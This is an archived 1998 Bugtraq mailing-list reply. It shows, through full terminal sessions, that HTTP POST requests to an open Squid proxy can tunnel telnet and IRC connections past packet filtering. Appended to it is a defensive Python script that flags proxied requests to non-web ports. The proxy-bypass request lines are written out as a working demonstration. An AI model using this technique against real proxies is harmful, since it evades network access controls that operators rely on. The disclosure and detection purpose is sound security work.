Bugtraq mailing list archives
Re: [NTSEC] By-passing MS Proxy 2.0 and others packet filtering
From: peter () ATTIC VUURWERK NL (Peter van Dijk)
Date: Tue, 13 Oct 1998 23:08:44 +0200
On Fri, Oct 09, 1998 at 07:46:38AM +0200, Jean-Christophe Touvet wrote:
> Date: Thu, 08 Oct 1998 08:27:36 +0100
> From: "Mnemonix" <mnemonix () globalnet co uk>
>
> > Firstly it seems that most web-based proxies, not just MS Proxy, are
> > susceptible to this kind of attack. Thanks to Greg Jones and others for
> > doing some testing on this.
>
> HTTP POST is limited: telnet, NetBios etc. will not work, while CONNECT
> will pass them straightforward.
Very untrue. Look at this:

[hardbeat@haarlem hardbeat]$ telnet proxy 8080
Trying 194.178.232.18...
Connected to rotterdam.vuurwerk.nl.
Escape character is '^]'.
POST http://telnet:23/ HTTP/1.0
VuurWerk Internet Telnet Server (telnet.vuurwerk.nl)
Alle transacties worden gelogged, het gebruik van deze server is alleen voor klanten van VuurWerk tbv. het onderhoud van hun eigen site.
POST / HTTP/1.0
Via: 1.0 rotterdam.vuurwerk.nl:8080 (Squid/1.1.21)
X-Forwarded-For: 194.178.232.22
Host: telnet.vuurwerk.nl
Cache-control: Max-age=259200
login: hardbeat
Password:
Last login: Tue Oct 13 22:59:49 from rotterdam
  PID TTY STAT  TIME COMMAND
 5896 p6  S     0:00 /bin/login -h p8ur.cistron.nl -p
 5901 p6  S     0:00  \_ -bash
 6175 p6  S     0:00      \_ telnet proxy 8080
 6186 p8  S     0:00 /bin/login -h rotterdam vuurwerk.nl -p
 6190 p8  S     0:00  \_ -bash
 6205 p8  R     0:00      \_ ps xfww
[hardbeat@haarlem hardbeat]$

Haarlem is the shellmachine here, also CNAMEd telnet. The proxy (Squid/1.1.21) will happily forward me, and telnet works as if there's no proxy in between.

Another great example:

[hardbeat@haarlem hardbeat]$ telnet proxy 8080
Trying 194.178.232.18...
Connected to rotterdam.vuurwerk.nl.
Escape character is '^]'.
POST http://irc.pi.net:6667/ HTTP/1.0
nick Hardbeat2
PING:1693634679
PONG 1693634679
USER hardbeat haarlem.vuurwerk.nl irc.pi.net :Peter van Dijk (via proxy)
:Antwerpen.Be.Eu.Undernet.org 001 Hardbeat2 :Welcome to the Internet Relay Network Hardbeat2
:Antwerpen.Be.Eu.Undernet.org 002 Hardbeat2 :Your host is Antwerpen.Be.Eu.Undernet.org, running version u2.10.04
:Antwerpen.Be.Eu.Undernet.org 003 Hardbeat2 :This server was created Fri Jun 19 1998 at 18:44:36 MET DST

I can happily IRC now... imagine how easy it would be to write an IRC bouncer that uses a proxy.

Lots of proxies have NO acl or firewall around them. The only thing I have _not_ succeeded in until now is chaining proxies with GET or POST requests.

Greetz, Peter.
--
'I guess anybody who walks away from a root shell at   : Peter van Dijk
 a nerd party gets what they deserve!' -- BillSF       : peter () attic vuurwerk nl
finger peter () jamaica xs4all nl for my public PGP-key
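A defender-side check for what Peter shows above, added here as an example and not part of the post or of Squid: it scans proxy access-log lines and reports GET/POST/CONNECT requests whose destination port is not a normal web port, which is what the telnet and IRC sessions above would look like in the proxy's own log. The log layout, the allowed-port set and the sample lines are assumptions.

```python
"""Flag forward-proxy requests aimed at ports that are not web ports.

Constructed sample lines follow the whitespace-separated Squid native
access.log layout (timestamp elapsed client action/status bytes method url
ident hierarchy/peer type); only client, method and URL are used.
"""
from urllib.parse import urlsplit
# Ports a forward proxy is normally expected to reach with GET/POST/CONNECT.
WEB_PORTS = {80, 443, 8000, 8080, 8443}
# Non-HTTP services worth naming when they appear behind a proxied request.
SERVICE_NAMES = {21: "ftp", 22: "ssh", 23: "telnet", 25: "smtp",
                 139: "netbios-ssn", 6667: "irc"}
# Constructed excerpt; 192.0.2.10 is a hypothetical client behind the proxy.
SAMPLE_LOG = """\
908315924.101 5 192.0.2.10 TCP_MISS/200 2910 GET http://www.vuurwerk.nl/ - DIRECT/192.0.2.2 text/html
908315930.482 60012 192.0.2.10 TCP_MISS/000 0 POST http://telnet.vuurwerk.nl:23/ - DIRECT/192.0.2.9 -
908315931.730 7 192.0.2.10 TCP_MISS/200 512 GET http://www.example.org:8080/ - DIRECT/192.0.2.5 text/html
908315999.004 120000 192.0.2.10 TCP_MISS/000 0 POST http://irc.pi.net:6667/ - DIRECT/192.0.2.6 -
908316005.111 3 192.0.2.10 TCP_MISS/200 0 CONNECT mail.example.org:443 - DIRECT/192.0.2.7 -
"""

def destination_port(method, url):
    """Return the destination port a proxied request line would reach."""
    if method == "CONNECT":
        host, _, port = url.rpartition(":")   # CONNECT carries host:port
        return int(port) if host and port.isdigit() else None
    parts = urlsplit(url)
    if parts.port is not None:                # explicit port, e.g. http://host:23/
        return parts.port
    return {"http": 80, "https": 443, "ftp": 21}.get(parts.scheme)

def find_tunnelled_requests(log_text):
    """Return (client, method, url, port, service) for each non-web-port request."""
    findings = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 7:
            continue                          # truncated or unrelated line
        client, method, url = fields[2], fields[5], fields[6]
        port = destination_port(method, url)
        if port is None or port in WEB_PORTS:
            continue
        findings.append((client, method, url, port,
                         SERVICE_NAMES.get(port, "unknown")))
    return findings

if __name__ == "__main__":
    for hit in find_tunnelled_requests(SAMPLE_LOG):
        print("%s %s %s -> port %d (%s)" % hit)
```

Run against the sample it reports only the two POST requests to ports 23 and 6667; the same port set is what a Squid Safe_ports ACL would deny up front.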